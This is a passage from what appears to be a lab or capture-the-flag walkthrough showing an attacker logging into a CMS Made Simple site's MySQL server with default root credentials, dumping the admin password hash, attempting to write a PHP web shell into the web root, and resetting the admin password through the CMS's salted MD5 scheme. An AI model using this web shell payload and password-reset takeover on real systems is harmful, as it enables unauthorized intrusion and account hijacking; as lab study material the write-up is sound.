3 :3306 mysql
$ mysql -h 192.168.131.74 -P 3306 -u root -p
Enter password: root
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| cmsms_db |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
MySQL [cmsms_db]> select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| 1 | admin | 59f9ba27528694d9b3493dfde7709e70 | 1 | | | admin@mycms.local | 1 | 2020-03-25 09:38:46 | 2020-03-26 10:49:17 |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
1 row in set (0.074 sec)
# write capability, maybe?
MySQL [cmsms_db]> SELECT "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/var/www/html/kashz.php';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
# update pass didnt work normally; specific to CMS MS
Using https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'NEW_PASSWORD'))) where username = 'USER_NAME'
MySQL [cmsms_db]> update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'iamkashz'))) where username = 'admin';
Query OK, 1 row affected (0.078 sec)
Rows matched: 1 Changed: 1 Warnings: 0
# password successfully changed.Last updated